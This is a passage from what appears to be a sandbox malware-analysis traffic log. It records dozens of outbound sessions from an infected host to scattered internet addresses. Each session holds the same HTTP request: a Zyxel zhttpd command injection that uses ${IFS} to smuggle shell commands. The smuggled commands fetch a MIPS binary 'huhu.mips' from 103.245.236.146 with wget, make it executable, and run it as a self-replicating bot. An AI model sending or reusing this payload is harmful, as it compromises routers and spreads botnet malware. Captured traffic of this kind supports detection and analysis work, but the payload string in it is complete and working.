                                                  Jan 19, 2024 18:23:50.962898970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3351192.168.2.134761877.212.75.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962949991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3352192.168.2.1346378180.130.205.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963001966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3353192.168.2.133937493.51.38.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963035107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3354192.168.2.1347826183.134.154.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963047981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3355192.168.2.1352034173.111.235.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963088036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3356192.168.2.1343080191.154.242.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963139057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3357192.168.2.135377643.109.198.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963184118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3358192.168.2.1349432173.39.47.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963232994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3359192.168.2.133294095.94.146.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963264942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3360192.168.2.1336050197.133.145.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963315010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3361192.168.2.1342378216.221.84.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963330030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3362192.168.2.1341306202.241.154.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963355064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3363192.168.2.1335046105.89.99.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963388920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3364192.168.2.134577047.82.158.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963423967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3365192.168.2.1348334118.246.105.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963450909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3366192.168.2.1341586179.159.73.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963481903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3367192.168.2.1338508138.82.171.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963516951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3368192.168.2.135108053.201.25.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963536024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3369192.168.2.1345436198.13.143.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963597059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3370192.168.2.1359496112.141.139.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963629961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3371192.168.2.1343196138.52.181.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963675022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3372192.168.2.134336675.214.208.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963732958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3373192.168.2.1355416220.117.231.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963762045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3374192.168.2.1332900186.182.100.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963802099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3375192.168.2.134955851.248.249.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963841915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3376192.168.2.133313214.78.255.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963891983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3377192.168.2.1344900133.243.187.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963924885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3378192.168.2.1342954150.166.184.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963953018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3379192.168.2.1352650180.52.146.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.963974953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3380192.168.2.1340926177.213.101.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.964041948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3381192.168.2.13504549.112.65.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.964077950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3382192.168.2.1342330121.224.248.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.964102983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3383192.168.2.1347316183.195.151.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.964135885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3384192.168.2.13553124.58.216.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.967776060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3385192.168.2.135262679.215.164.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.967813015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3386192.168.2.134492224.141.66.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.967847109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3387192.168.2.1350090170.202.49.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976025105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3388192.168.2.1355362140.7.207.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976092100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3389192.168.2.1334788199.81.76.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976145983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3390192.168.2.1340970124.181.229.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976190090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3391192.168.2.1344826152.141.186.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976246119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3392192.168.2.135808619.117.175.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976289988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3393192.168.2.133298087.119.46.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976320982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3394192.168.2.1346454147.239.161.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976346016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3395192.168.2.1350672170.63.36.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976416111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3396192.168.2.1355198201.13.25.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976429939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3397192.168.2.1336926195.228.51.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976483107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3398192.168.2.135676027.247.163.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976505995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3399192.168.2.1345214140.122.227.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976550102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3400192.168.2.133325413.23.89.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976591110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3401192.168.2.1353160103.231.196.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976650953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3402192.168.2.134474669.50.183.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976682901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3403192.168.2.1347506161.29.129.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976727009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3404192.168.2.135043289.197.191.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976797104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3405192.168.2.1347052166.87.209.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976819992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3406192.168.2.133458042.251.43.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976878881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3407192.168.2.134148444.33.180.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976912975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3408192.168.2.134030839.13.237.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.976948977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3409192.168.2.1336658192.119.122.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977010965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3410192.168.2.134804640.189.204.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977035999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3411192.168.2.1355560141.138.214.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977076054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3412192.168.2.1349640109.139.81.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977127075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3413192.168.2.135575295.43.194.200443
                                                  TimestampBytes transferredDirectionData
